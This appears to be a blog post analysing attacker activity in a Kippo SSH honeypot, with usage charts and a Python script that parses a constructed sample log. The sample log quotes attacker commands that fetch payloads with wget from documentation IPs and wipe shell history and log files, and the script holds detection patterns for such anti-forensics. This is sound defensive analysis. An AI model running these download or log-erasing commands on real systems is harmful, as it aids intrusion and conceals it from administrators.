SSH Honeypotting – Bad guy in action.

An SSH server allows remote control of, and access to, a system. In this article I present my analysis of the files and activity captured from attackers trapped in our SSH honeypot.

I will also post several videos (screen playbacks) of the attackers' activity in my honeypot.

Begin:

A few months back I launched my project “Capturing Malware with Honeypot on Unifi”: https://wnnsnn.wordpress.com/2012/09/19/malware-honeypot-on-unifi-dionaea/

This project is something I am interested in, and I am able to publish my findings publicly.

An SSH server is a program that uses the Secure Shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal sessions are the most common uses of an SSH server.

SSH servers are widely used in both the private sector and government; for example, they are deployed on DNS servers, mail servers and most Linux and UNIX servers, which is exactly why they are a constant target for brute-force logins.

I would like to start this post with the statistics and results I got from my honeypot.

Top 10 SSH clients

This vertical bar chart displays the top 10 SSH client versions attackers used, with the total number of attempts detected for each. Note that the version string is the banner the client sends, so it identifies the tool the attacker claims to use and can be spoofed.

[Chart: SSH Client Version]

Top 10 usernames

This vertical bar chart displays the top 10 usernames that attackers tried when attacking the system.

[Chart: Top Usernames Used]

Playback screen (watch this):

This video shows the attacker's activity after they managed to guess the password of my running Kippo honeypot.

Playback screen, from the log file: the attacker deleting history and log files.

In this video you will find several methods and commands the attacker executed to remove and hide traces of their activity.

From the log file: wget commands

The following table displays the latest “wget” commands entered by attackers in the honeypot system.

[Screenshot taken 2013-01-29 at 10.40.32 AM: table of wget commands]
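To show how the charts and tables above are built from the raw log, here is an added example. It is my own code, not code from Kippo or from the original post: it parses Kippo-style log lines, counts client version banners and usernames for the two top-10 charts, flags the history and log-deletion commands seen in the playback, and pulls the download URLs out of wget commands. The log lines are constructed for the example and only approximate Kippo's log format; the regexes assume that layout, so check them against your own kippo.log before relying on them.

```python
"""Summarise a Kippo SSH-honeypot log: top client versions, top usernames,
anti-forensics commands (history/log deletion) and wget download URLs.

The log lines below are CONSTRUCTED for this example and only approximate
Kippo's real log format (the field layout is an assumption; check it
against your own kippo.log before relying on the regexes)."""
import re
from collections import Counter

SAMPLE_LOG = """\
2013-01-29 10:40:32+0800 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 203.0.113.7:51234 (10.0.0.5:2222) [session: 1]
2013-01-29 10:40:32+0800 [HoneyPotTransport,1,203.0.113.7] Remote SSH version: SSH-2.0-libssh2_1.4.2
2013-01-29 10:40:33+0800 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/123456] failed
2013-01-29 10:40:34+0800 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password] succeeded
2013-01-29 10:40:40+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: unset HISTFILE
2013-01-29 10:40:41+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: wget http://198.51.100.9/bot.tgz
2013-01-29 10:40:45+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.7] CMD: rm -rf /var/log/wtmp /root/.bash_history
2013-01-29 11:02:10+0800 [HoneyPotTransport,2,198.51.100.23] Remote SSH version: SSH-2.0-PuTTY_Release_0.62
2013-01-29 11:02:11+0800 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [admin/admin] failed
2013-01-29 11:02:12+0800 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [oracle/oracle] failed
2013-01-29 11:02:13+0800 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.23] login attempt [root/toor] failed
2013-01-29 11:30:00+0800 [HoneyPotTransport,3,192.0.2.50] Remote SSH version: SSH-2.0-libssh2_1.4.2
2013-01-29 11:30:01+0800 [SSHService ssh-userauth on HoneyPotTransport,3,192.0.2.50] login attempt [root/root] succeeded
2013-01-29 11:30:05+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,192.0.2.50] CMD: export HISTFILE=/dev/null; wget -O /tmp/x http://203.0.113.200/x.sh
2013-01-29 11:30:09+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,192.0.2.50] CMD: cat /dev/null > ~/.bash_history
"""

# Assumed field layout: "[... HoneyPotTransport,<session>,<ip>] <event>"
VERSION_RE = re.compile(
    r"\[HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] Remote SSH version: (?P<ver>\S+)")
LOGIN_RE = re.compile(
    r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] login attempt "
    r"\[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)")
CMD_RE = re.compile(r"HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+")

# Anti-forensics idioms of the kind shown in the playback, each with a label.
ANTI_FORENSICS = [
    (re.compile(r"\bunset\s+HIST(?:FILE|SIZE|FILESIZE)\b"), "history variable unset"),
    (re.compile(r"\bHIST(?:FILE|SIZE|FILESIZE)=(?:0|/dev/null)\b"), "history redirected or sized to zero"),
    (re.compile(r"\bhistory\s+-[cw]\b"), "history cleared in-shell"),
    (re.compile(r"\brm\b[^;|&]*(?:\.bash_history|/var/log/)"), "history or log files removed"),
    (re.compile(r">\s*(?:~|/root|/home/\S+)?/?\S*\.bash_history\b|>\s*/var/log/\S+"),
     "history or log file truncated"),
]


def parse_kippo_log(text):
    """Walk the log once and collect the facts the honeypot charts are built from."""
    stats = {
        "clients": Counter(),      # client version banner -> connections
        "usernames": Counter(),    # username -> login attempts
        "successful_logins": [],   # (ip, user, password)
        "commands": [],            # (ip, command) for every shell command
        "wget_urls": [],           # (ip, url) for each wget download
        "anti_forensics": [],      # (ip, command, label)
    }
    for line in text.splitlines():
        m = VERSION_RE.search(line)
        if m:
            stats["clients"][m.group("ver")] += 1
            continue
        m = LOGIN_RE.search(line)
        if m:
            stats["usernames"][m.group("user")] += 1
            if m.group("result") == "succeeded":
                stats["successful_logins"].append((m.group("ip"), m.group("user"), m.group("pw")))
            continue
        m = CMD_RE.search(line)
        if m:
            ip, cmd = m.group("ip"), m.group("cmd").strip()
            stats["commands"].append((ip, cmd))
            if re.search(r"\bwget\b", cmd):
                stats["wget_urls"].extend((ip, u) for u in URL_RE.findall(cmd))
            for pattern, label in ANTI_FORENSICS:   # first matching idiom wins
                if pattern.search(cmd):
                    stats["anti_forensics"].append((ip, cmd, label))
                    break
    return stats


def top_n(counter, n=10):
    """The (value, count) pairs plotted in the top-10 bar charts."""
    return counter.most_common(n)


if __name__ == "__main__":
    s = parse_kippo_log(SAMPLE_LOG)
    print("Top SSH clients:")
    for ver, n in top_n(s["clients"]):
        print(f"  {n:4d}  {ver}")
    print("Top usernames:")
    for user, n in top_n(s["usernames"]):
        print(f"  {n:4d}  {user}")
    print("Successful logins:", s["successful_logins"])
    print("wget URLs:")
    for ip, url in s["wget_urls"]:
        print(f"  {ip}  {url}")
    print("Anti-forensics commands:")
    for ip, cmd, label in s["anti_forensics"]:
        print(f"  {ip}  [{label}]  {cmd}")
```

Run it against a real kippo.log by reading the file into `parse_kippo_log`; the anti-forensics patterns are deliberately narrow, so treat a hit as a reason to replay that session rather than as a complete detector.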
